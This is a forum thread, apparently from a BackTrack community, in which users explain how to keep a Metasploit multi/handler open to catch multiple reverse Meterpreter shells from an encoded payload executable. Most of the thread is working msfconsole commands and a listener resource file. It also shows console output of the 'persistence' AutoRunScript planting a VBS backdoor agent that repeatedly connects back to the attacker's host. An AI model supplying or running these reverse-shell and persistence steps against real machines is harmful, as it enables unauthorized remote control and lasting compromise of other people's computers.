Handling multiple reverse shells with exploit/multi/handler

[jazsun]

I've really been digging into backtrack lately and just learned a ton within a week or so. I have a question concerning handlers. I built an exe using one of backtracks payloads and encoded it, now when I run this exe on a client machine, and have the handler on the listening (attacking machine) pc the client connects back and I get a sessions but even if I launch the handler using "exploit -j" the handler closes after the first sessions or connect back, meaning if other clients try to reverse connect to the server afterwards they won't get a sessions. I have checked that the handler has closed by running the "jobs" command and it comes back as having no current jobs.

My commands for the handler under msfconsole:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.1.10
set LPORT 31337
exploit -j

This works fine and dandy for one client but the handler closes after a single connect back. I would like to have a handler open for an extended period of time where so that all pcs I have can connect back to it at whatever time that may be.

[skidmarq]

Look into the exit technique used when creating the exploit payload...

[espreto]

If I understand, try and see the show advanced options you can use. For example: AutoRunScript.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.1.10
set LPORT 31337
set AutoRunScript persistence
exploit -j

Code:

msf exploit(handler) > exploit -j[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.166:4444[*] Starting the payload handler...
msf exploit(handler) >[*] Sending stage (748032 bytes) to 192.168.1.106[*] Meterpreter session 1 opened (192.168.1.166:4444 -> 192.168.1.106:1051) at 2010-06-19 00:23:53 -0300[*] Session ID 1 (192.168.1.166:4444 -> 192.168.1.106:1051) processing AutoRunScript 'persistence'[*] Creating a persistent agent: LHOST=192.168.1.166 LPORT=4444 (interval=5 onboot=false)[*] Persistent agent script is 315343 bytes long[*] Uploaded the persistent agent to C:\DOCUME~1\plum\CONFIG~1\Temp\MFmNdxGgY.vbs[*] Agent executed with PID 1308[*] For cleanup use command: run multi_console_command -rc /root/.msf3/logs/persistence/FORT_20100619.2354/clean_up__20100619.2354.rc

msf exploit(handler) > sessions -l

Active sessions
===============

  Id  Type         Information       Connection
  --  ----         -----------       ----------
  1   meterpreter  FORT\plum @ FORT  192.168.1.166:4444 -> 192.168.1.106:1051

msf exploit(handler) > 
msf exploit(handler) > sessions -i 1[*] Starting interaction with 1...

meterpreter > background
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.166:4444[*] Starting the payload handler...[*] Sending stage (748032 bytes) to 192.168.1.106[*] Meterpreter session 2 opened (192.168.1.166:4444 -> 192.168.1.106:1061) at 2010-06-19 00:27:35 -0300[*] Session ID 2 (192.168.1.166:4444 -> 192.168.1.106:1061) processing AutoRunScript 'persistence'
[*] Creating a persistent agent: LHOST=192.168.1.166 LPORT=4444 (interval=5 onboot=false)[*] Persistent agent script is 313911 bytes long[*] Uploaded the persistent agent to C:\DOCUME~1\plum\CONFIG~1\Temp\WVcBemSo.vbs[*] Agent executed with PID 1256[*] For cleanup use command: run multi_console_command -rc /root/.msf3/logs/persistence/FORT_20100619.2736/clean_up__20100619.2736.rc

meterpreter > background
msf exploit(handler) > sessions -l

Active sessions
===============

  Id  Type         Information       Connection
  --  ----         -----------       ----------
  1   meterpreter  FORT\plum @ FORT  192.168.1.166:4444 -> 192.168.1.106:1051
  2   meterpreter  FORT\plum @ FORT  192.168.1.166:4444 -> 192.168.1.106:1061

msf exploit(handler) > 
msf exploit(handler) > exit -y
root@bt:/pentest/exploits/framework3# msfconsole

                _                  _       _ _
               | |                | |     (_) |
 _ __ ___   ___| |_ __ _ ___ _ __ | | ___  _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | |  __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
                            | |
                            |_|


       =[ metasploit v3.4.1-dev [core:3.4 api:1.0]
+ -- --=[ 563 exploits - 273 auxiliary
+ -- --=[ 209 payloads - 26 encoders - 8 nops
       =[ svn r9562 updated today (2010.06.19)

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.166

LHOST => 192.168.1.166
msf exploit(handler) > set LPORT 4444
LPORT => 4444

msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.166:4444[*] Starting the payload handler...[*] Sending stage (748032 bytes) to 192.168.1.106[*] Meterpreter session 1 opened (192.168.1.166:4444 -> 192.168.1.106:1079) at 2010-06-19 00:31:59 -0300

meterpreter >

With persistence is created a "backdoor" that always tries to connect to your machine. Understand?
Many more things to do, look at each advanced option!

Helped?

Now go back to studies!

Regards,

[ondrovic]

Here are the 2 files that I use

listener.rc make sure to put the file listener.rc into /opt/metasploit/msf3/ and edit the values to match your ip address and port

Code:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.117
set LPORT 31337
set ExitOnSession false
exploit -j -z

call it up into msfconsole

Code:

msfconsole -r /opt/metasploit/msf3/listener.rc

Hope this helps

[killadaninja]

My commands for the handler under msfconsole:

Code:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.1.10
set LPORT 31337
exploit -j

This works fine and dandy for one client but the handler closes after a single connect back. I would like to have a handler open for an extended period of time where so that all pcs I have can connect back to it at whatever time that may be.

You are missing

Code:

set ExitOnSession false

Try

Code:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set ExitOnSession false
set LHOST 10.0.1.10
set LPORT 31337
exploit -j

Also once in a active sessions use can use the background command to navigate back without terminating the session. i.e.

Code:

meterpreter > background
msf exploit(handler) > sessions -l

[jazsun]

Thanks a lot guys, I really appreciate the help. I had no idea there was even a "show advanced" option. I will definitely explore the advanced options more. Thanks!

Also, I didn't see AutoRunScript as an option after running "show advanced" is this something that is somewhat hidden? I assume it makes the injected client side meterpreter backdoor continuously try to connect back to the server (attacker)?

Here are the 2 files that I use

listener.rc make sure to put the file listener.rc into /opt/metasploit/msf3/ and edit the values to match your ip address and port

Code:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.117
set LPORT 31337
set ExitOnSession false
exploit -j -z

call it up into msfconsole

Code:

msfconsole -r /opt/metasploit/msf3/listener.rc

Hope this helps

Thanks for the script!

[killadaninja]

Also, I didn't see AutoRunScript as an option after running "show advanced" is this something that is somewhat hidden? I assume it makes the injected client side meterpreter backdoor continuously try to connect back to the server (attacker)

No, it`s just an option to which you can set the path, it automatically will start a specified script when you start a session (on the attackers computer).